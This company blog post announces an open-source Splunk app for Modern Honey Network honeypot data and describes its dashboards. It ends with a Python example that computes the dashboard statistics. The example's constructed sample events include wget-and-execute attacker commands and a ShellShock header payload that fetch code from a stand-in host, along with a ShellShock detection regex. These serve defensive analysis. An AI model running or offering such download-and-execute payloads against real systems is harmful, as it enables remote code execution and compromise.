May 2, 2015 - Jason Trost

MHN + Splunk: Announcing the Modern Honey Network Splunk Application

<p>During our presentation on "Lessons Learned from Building and Running MHN, the World's Largest Crowd-sourced Honeynet" at the <a href="http://www.securitybsides.com/w/page/90944586/BSidesSF2015" target="_blank">BSidesSF 2015</a> conference we released a free and open source (LGPL) Modern Honey Network application for Splunk. The application is available for download from Splunkbase <a href="https://splunkbase.splunk.com/app/2707/" target="_blank">here</a> and the code is available on GitHub <a href="https://github.com/threatstream/mhn-splunk" target="_blank">here</a>. Here is a link to a <a href="https://www.youtube.com/watch?v=Zd1Br8TW1mk">recording of the talk</a> and the <a href="http://www.slideshare.net/jasontrost/lessons-learned-from-building-and-running-mhn-the-worlds-largest-crowdsourced-honeynet" target="_blank">slides</a>. Modern Honey Network (MHN) is a free and open source (LGPL) platform for deploying and managing honeypots and leveraging their data.</p><p><a href="https://www.youtube.com/watch?v=Zd1Br8TW1mk"><img border="1" src="https://cdn.filestackcontent.com/Ijyazh3Sdu7Hs1bC8AOw"/></a></p><p>The MHN Splunk app allows MHN users to deploy honeypots and then search, explore, analyze, and alert on events from those honeypots using their Splunk instance. All pages show the last 24 hours of data by default, but this can be changed by selecting a larger date range from the time-window drop-down. Below are screenshots of some of the dashboards this application includes.</p><p><b>Overview Dashboard</b>: this is the home screen of the MHN Splunk app. 
It shows high-level summary statistics about all of your honeypots, including:</p><ul><li>Number of Attacks</li><li>Unique Attacker IPs</li><li>Unique MD5s collected</li><li>Unique URLs collected</li><li>Number of commands executed</li><li>Attacks per hour</li><li>Global Distribution of attack sources</li><li>And many more</li></ul><p><img border="1" src="https://cdn.filestackcontent.com/IjqyeNnZQPSW7XuPjAF2"/></p><p><b>Kippo Analytics:</b> this page shows all the relevant data collected by <a href="https://github.com/desaster/kippo" target="_blank">Kippo</a> honeypots. Kippo is an SSH honeypot that allows attackers to successfully "log in" and gain a command shell on an emulated Linux system. It lets defenders capture the commands attackers run during their post-compromise activity, which is very useful for obtaining copies of their tools and locating the sites they distribute malware from. This dashboard includes top usernames, passwords, username/password combinations, and top commands executed.</p><p><img border="1" src="https://cdn.filestackcontent.com/jyd2S6hTTOmJ7g3ZeN10"/></p><p><b>p0f Analytics:</b> this page shows all the data collected when performing passive OS fingerprinting using <a href="http://lcamtuf.coredump.cx/p0f3/" target="_blank">p0f</a>. 
This lets defenders sometimes glean the operating system, connection type, application name, uptime, and other attributes of hosts that are actively probing or interacting with your honeypot systems.</p><p><img border="1" src="https://cdn.filestackcontent.com/aN3L5soT3SppOosgxEgx"/></p><p><b>Conpot Analytics:</b> this dashboard displays all the event data collected from <a href="http://conpot.org/" target="_blank">Conpot</a>, an industrial control systems (ICS) honeypot.</p><p><img border="1" src="https://cdn.filestackcontent.com/MTd7V222RxCgr10CCry5"/></p><p><b>Shockpot Analytics:</b> this dashboard displays all the event data collected from <a href="https://github.com/threatstream/shockpot" target="_blank">Shockpot</a>. Shockpot is a web application honeypot designed to mimic an application vulnerable to the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" target="_blank">ShellShock vulnerability</a> (CVE-2014-6271) and capture the HTTP payloads used during exploitation.</p><p><img border="1" src="https://cdn.filestackcontent.com/irPY6TgYRd00awYiLdlz"/></p><p><b>Dionaea Analytics:</b> this dashboard displays all the event data collected from <a href="http://dionaea.carnivore.it/" target="_blank">Dionaea</a>. Dionaea is a very extensible honeypot that emulates many different services, including SMB, HTTP, FTP, TFTP, MSSQL, MySQL, SIP, and SDP. It excels at capturing payloads and malware, especially from Windows exploitation attempts.</p><p><img border="1" src="https://cdn.filestackcontent.com/gLlgv1yFQqONPoaARY1S"/></p><p><b>Snort/Suricata Analytics:</b> this dashboard displays all the event data collected from <a href="https://www.snort.org/" target="_blank">Snort</a> or <a href="http://suricata-ids.org/" target="_blank">Suricata</a>. 
Snort and Suricata are not honeypots, but they are incredibly useful when deployed alongside honeypots for providing added context about which specific vulnerabilities are being exploited.</p><p><img border="1" src="https://cdn.filestackcontent.com/erz2W1qRpiFuWCqRAxQ2"/></p><p>We will continue building out this Splunk application for the other honeypots supported by MHN (<a href="http://brindi.si/g/projects/wordpot.html" target="_blank">Wordpot</a>, <a href="https://github.com/jordan-wright/elastichoney" target="_blank">ElasticHoney</a>, <a href="http://glastopf.org/" target="_blank">Glastopf</a>, and <a href="http://amunhoney.sourceforge.net/" target="_blank">Amun</a>) and as new honeypots are added to the MHN platform. This project is open source (LGPL) and we encourage anyone interested to check the project out on <a href="https://github.com/threatstream/mhn-splunk" target="_blank">GitHub</a> and give us feedback on how to make it better (or pull requests with new features).</p><p>If this sort of work interests you, ThreatStream is <a href="https://www.anomali.com/company/careers">hiring both researchers and engineers</a> and if you want to be protected from threats like this, <a href="https://ui.threatstream.com/registration/">sign up to try ThreatStream Optic</a>. Lastly, if you are getting benefit from honeypots we would highly recommend <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;hosted_button_id=8WPALKEE9GMSC" target="_blank">donating</a> to the <a href="http://honeynet.org/" target="_blank">Honeynet Project</a>, an international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security.</p>
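<p>To make the dashboard numbers above concrete, here is an added example in Python (not code from the MHN Splunk app, MHN, or ThreatStream) that computes the Overview counters, the Kippo top-N tables, the malware distribution sites pulled out of Kippo command lines, and a ShellShock payload check over Shockpot request headers, all from a handful of constructed events and the same 24-hour default window the dashboards use. The event layout, channel names, field names and timestamps are assumptions made for the example; the real app does this with Splunk searches over the log data MHN produces, and the geographic distribution panel is omitted because it needs a GeoIP database.</p>

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample events (assumption: this simplified dict layout stands
# in for MHN's real log format; it is not what MHN or the Splunk app emit).
SAMPLE_EVENTS = [
    {"channel": "kippo.sessions", "timestamp": "2015-05-01T09:12:00Z",
     "src_ip": "203.0.113.5", "username": "root", "password": "123456",
     "commands": ["wget http://198.51.100.7/x.sh", "chmod +x x.sh", "./x.sh"]},
    {"channel": "kippo.sessions", "timestamp": "2015-05-01T11:40:00Z",
     "src_ip": "203.0.113.9", "username": "root", "password": "admin",
     "commands": ["uname -a", "wget http://198.51.100.7/x.sh"]},
    {"channel": "kippo.sessions", "timestamp": "2015-05-01T14:05:00Z",
     "src_ip": "203.0.113.5", "username": "admin", "password": "admin",
     "commands": ["cat /proc/cpuinfo"]},
    {"channel": "dionaea.capture", "timestamp": "2015-05-01T15:30:00Z",
     "src_ip": "198.51.100.23", "md5": "d41d8cd98f00b204e9800998ecf8427e",
     "url": "http://198.51.100.7/x.sh"},
    {"channel": "dionaea.capture", "timestamp": "2015-05-01T16:00:00Z",
     "src_ip": "198.51.100.24", "md5": "d41d8cd98f00b204e9800998ecf8427e",
     "url": "http://198.51.100.7/y.sh"},
    {"channel": "shockpot.events", "timestamp": "2015-05-01T17:45:00Z",
     "src_ip": "192.0.2.77",
     "headers": {"User-Agent": "() { :;}; /bin/bash -c 'wget http://198.51.100.7/z'"}},
    {"channel": "shockpot.events", "timestamp": "2015-05-01T18:10:00Z",
     "src_ip": "192.0.2.78", "headers": {"User-Agent": "Mozilla/5.0"}},
    # Older than the default 24-hour window, so the dashboards would not show it.
    {"channel": "kippo.sessions", "timestamp": "2015-04-28T08:00:00Z",
     "src_ip": "203.0.113.40", "username": "root", "password": "toor",
     "commands": ["ls"]},
]

# Constructed "now" so the example is deterministic offline.
NOW = datetime(2015, 5, 2, 0, 0, tzinfo=timezone.utc)


def _ts(event):
    return datetime.strptime(event["timestamp"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def in_window(events, now=NOW, window=timedelta(hours=24)):
    """Apply the dashboards' default time window (last 24 hours)."""
    return [e for e in events if now - window <= _ts(e) <= now]


def overview_stats(events, now=NOW, window=timedelta(hours=24)):
    """The counters shown on the Overview dashboard."""
    recent = in_window(events, now, window)
    return {
        "attacks": len(recent),
        "unique_attacker_ips": len({e["src_ip"] for e in recent}),
        "unique_md5s": len({e["md5"] for e in recent if "md5" in e}),
        "unique_urls": len({e["url"] for e in recent if "url" in e}),
        "commands_executed": sum(len(e.get("commands", [])) for e in recent),
        # hour-of-day -> attack count, the series behind "Attacks per hour"
        "attacks_per_hour": dict(Counter(_ts(e).strftime("%H") for e in recent)),
    }


def kippo_stats(events, top=3):
    """Top usernames, passwords, username/password combos and commands."""
    sessions = [e for e in in_window(events) if e["channel"] == "kippo.sessions"]
    return {
        "top_usernames": Counter(e["username"] for e in sessions).most_common(top),
        "top_passwords": Counter(e["password"] for e in sessions).most_common(top),
        "top_combos": Counter((e["username"], e["password"]) for e in sessions).most_common(top),
        "top_commands": Counter(c for e in sessions for c in e["commands"]).most_common(top),
    }


URL_RE = re.compile(r"https?://\S+")


def download_sites(events):
    """URLs fetched inside Kippo sessions: where attackers host their tools."""
    return Counter(url for e in in_window(events) if e["channel"] == "kippo.sessions"
                   for cmd in e["commands"] for url in URL_RE.findall(cmd))


# The "() {" function-definition prefix that every ShellShock payload starts with.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def shockpot_findings(events):
    """(src_ip, header name, header value) for each Shockpot request carrying a ShellShock payload."""
    hits = []
    for e in events:
        if e["channel"] != "shockpot.events":
            continue
        for name, value in e.get("headers", {}).items():
            if SHELLSHOCK_RE.search(value):
                hits.append((e["src_ip"], name, value))
    return hits


if __name__ == "__main__":
    print(overview_stats(SAMPLE_EVENTS))
    print(kippo_stats(SAMPLE_EVENTS))
    print(download_sites(SAMPLE_EVENTS))
    print(shockpot_findings(SAMPLE_EVENTS))
```

<p>The window filter is what makes the numbers match what the dashboards show by default: the stale Kippo session from April drops out of every counter, and the download-site counter is the same data the Kippo dashboard's top-commands table contains, just reduced to the URLs a defender would block or fetch samples from.</p>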
